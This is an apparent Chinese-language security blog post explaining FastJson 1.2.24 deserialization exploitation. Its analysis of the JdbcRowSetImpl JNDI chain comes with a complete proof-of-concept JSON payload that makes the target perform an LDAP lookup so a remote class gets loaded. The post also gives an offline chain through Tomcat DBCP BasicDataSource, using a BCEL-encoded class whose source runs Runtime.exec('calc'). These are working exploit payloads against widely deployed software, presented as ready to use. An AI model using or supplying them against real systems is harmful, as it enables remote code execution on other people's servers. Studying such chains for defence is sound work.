FastJson反序列化2-1.2.24漏洞利用

1、1.2.24漏洞利用-JNDI

漏洞利用思路，如果某个类的set()方法中使用了JNDI，那么则可以使用JDNI注入执行任意命令。事实上在JDK8中就存在这样的类：JDBCRowSetImpl;

该类实现了JdbcRowSwt接口，继承自BaseRowSet; package com.sun.rowset;

其中setAutoCommit方法中的else分支调用了connect方法

这个方法用于获取数据库连接。它首先检查是否已经存在连接（this.conn），如果存在则直接返回；如果没有，则根据配置获取数据库连接。

而获取连接的方式是如果配置了数据源名称 (this.getDataSourceName() != null)，则尝试通过 JNDI 查找数据源，然后获取连接。如果配置了用户名和密码，则使用提供的用户名和密码来获取连接。

DataSourceName有对应的Set方法；

为空的情况下会调用父类的setDataSourceName方法，父类仅仅做了是否为空的判断，然后就是简单的赋值。

所以我们可以反序列化这个类，然后设置属性autocommit,让其调用connect方法，通过 JNDI 查找数据源，而数据源的地址设置为恶意地址，使其执行恶意命令。

使用Yakit生成LDAP反连地址，构造恶意类，执行clac命令。

完整POC如下：

public class Main {
    public static void main(String[] args) {
        String str1="{\"@type\":\"org.example.bean.FastJsonJdbcRowSetImpl\",\"DataSourceName\":\"ldap://127.0.0.1:5555/qjMfJBxp\",\"autoCommit\":0}";
        //FastJsonJdbcRowSetImpl是我自己创建的一个类 实际上可以直接用JdbcRowSetImpl
        JSONObject jsonObject = JSON.parseObject(str1);
    }
}

2、1.2.24 不出网利用

这里只给出了paseObject方法的利用链，paseObject方法会调用所有get方法，后续有时间再补充pase方法利用链，或者可以参考文章：

https://forum.butian.net/share/2040

String s1="{\"@type\":\"org.apache.tomcat.dbcp.dbcp2.BasicDataSource\",
    \"DriverClassName\":\"$$BCEL$$$l$8b$I$A$A$A$A$A$A$AmQMO$db$40$Q$7d$93$84$d81N$n$81$EJi$v$l$85$84C$7d$e9$z$88KE$a5$aanA$N$K$e2$b8$d9$$aS$c7$8e$i$H$f2$8fz$e6$C$VHp$ef$8f$aa$98u$a34$SX$f2$cc$ce$7b3o$9e$d7$7f$fe$de$de$D$f8$80$9a$83$C$96$j$bc$c4$8a$8dW$s$afZxm$e1$8d$83$3c$d6$y$bc$b5$b0N$c8$ef$e9P$t$fb$84l$ad$de$o$e4$3eF$3f$Ua$ce$d7$a1$fa6$ec$b5U$7c$y$da$B$pe$3f$92$oh$89X$9bz$M$e6$92s$3d$mT$fd$u$eexj$qz$fd$40ym$rB$ef$60$d4o$Q$ec$3d$Z$8c$e5$89$db$x$7eW$5c$IOG$de$e7$c3$83$91T$fdDG$n$b7$V$9b$89$90$3f$bf$8a$7e$w$cb$s$JN3$g$c6R$7d$d2f$8d$cdj$ef$cd$a8$L$H$b3$W6$5clb$8b$d7$b3$p$e9$e2$j$b6$J$L$cfH$TVR4$Qa$c7$fb$3e$M$T$ddS$T$d2h$ed$Q$W$9f$b3N$98$ff$3fx$d8$ee$w$99$QJO$b4$d8fG$r$93$a2R$ab$fbOz$f8$f3rj$a4$qa$a76$c56$93X$87$9d$c6$f4$c0Q$iI5$Y$f0$c0$f2t$e7$f1y$i$5d$9a$7bi$d4$5bX$87$cd$3f$d5$3c$Z$90$b9$M$8e$$W$kg$e2$3c$b3$7b$D$baJ$e9$o$c7$fc$3f$Q$_8$ba$e3$f3$i$e69$db$uM$86$cf$90M$b9$a5$df$c8$94$b3$d7$c8$9d$fcB$f1$cb$j$f2$a7$acf$3d$5c$a5d$81$5bg$b8$d1$c8V$f9$84$d4$c9$y$a3$F$c6$i$c6$dc$c9$9a$oce$yp$b5$c8$af$85$8co$a1R$60$a2$9a$3a$5bz$E3$a2$e2$80$a3$C$A$A\",
    \"DriverClassLoader\":{\"@type\":\"com.sun.org.apache.bcel.internal.util.ClassLoader\"}
}";

public class Exp {
    static {
        try {
            Runtime.getRuntime().exec("calc");
        } catch (IOException e) {
            throw new RuntimeException(e);
        }
    }
    //可以使用javac 编译，或使用Repository 且编译后需要encode
}